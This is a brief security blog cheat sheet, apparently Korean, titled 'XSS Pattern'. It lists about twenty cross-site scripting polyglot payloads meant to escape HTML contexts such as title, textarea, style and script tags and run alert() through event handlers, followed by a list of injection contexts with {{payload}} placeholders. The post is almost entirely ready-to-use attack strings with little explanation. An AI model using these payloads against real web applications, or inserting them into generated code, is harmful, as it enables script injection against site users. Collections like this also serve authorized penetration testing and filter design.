Everything is hacked.

There is no 100 % security.

CheatSheet/WEB

XSS Pattern

Kai_HT 2023. 8. 22. 13:25

https://www.geeksforgeeks.org/what-is-cross-site-scripting-xss/

jaVasCript:/*-/*` /*\`/*'/*"/**/(/ * */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/<titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e 

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> 

javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>

javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> 
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`

javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`

javascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;i<frame */ onload=alert()//</script>

javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*&lt;i<frame/*/ onload=alert()//</Script>

javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript>&lt;<script/>/<frame */; onload=alert()//&lt</script>`

javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript>&lt;<script/>/<frame */; onload=alert()//&lt</script>`

javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame &lt;svg"///*/ onload=alert()//</script>

javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame &lt;svg"///*/ onload=alert()//</script> 

javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/&lt;svg/*/onload= alert()//</script>

javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/&lt;svg */ onload=alert()//</script> 

javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*&lt;svg <frame */ onload=alert()//</script>

javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame &lt;svg */ onload=alert()//</script>

javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*&lt;svg <frame onload=/**/alert()//</script> 

javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>-->&lt;<script>alert()&lt;</script><frame/*/ onload=alert()//>

javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//&lt;svg <frame */onload= alert()//</script> 

javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//&lt;svg <frame */onload= alert()//</script> 

javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()-->&lt;<svg/*/ onload=alert()//>    <div class="{{payload}}"></div> <div class='{{payload}}'></div> <title>{{payload}}</title> <textarea>{{payload}}</textarea> <style>{{payload}}</style> <noscript>{{payload}}</noscript> <noembed>{{payload}}</noembed> <template>{{payload}}</template> <frameset>{{payload}}</frameset> <select><option>{{payload}}</option></select> <script type="text/template">{{payload}}</script> <!--{{payload}}--> <iframe src="{{payload}}"></iframe> " →   <iframe srcdoc="{{payload}}"></iframe>  " →  < →   <script>"{{payload}}"</script>  </script → <\/script  <script>'{{payload}}'</script>  </script → <\/script  <script>`{{payload}}`</script>  </script → <\/script  <script>//{{payload}}</script>  </script → <\/script  <script>/*{{payload}}*/</script>  </script → <\/script  <script>"{{payload}}"</script>  </script → <\/script " → \"

'CheatSheet > WEB' 카테고리의 다른 글

Web Editor Default Page Location  (0) 2023.08.24
Webshell - Cheetsheat (jsp/jspx)  (0) 2023.08.22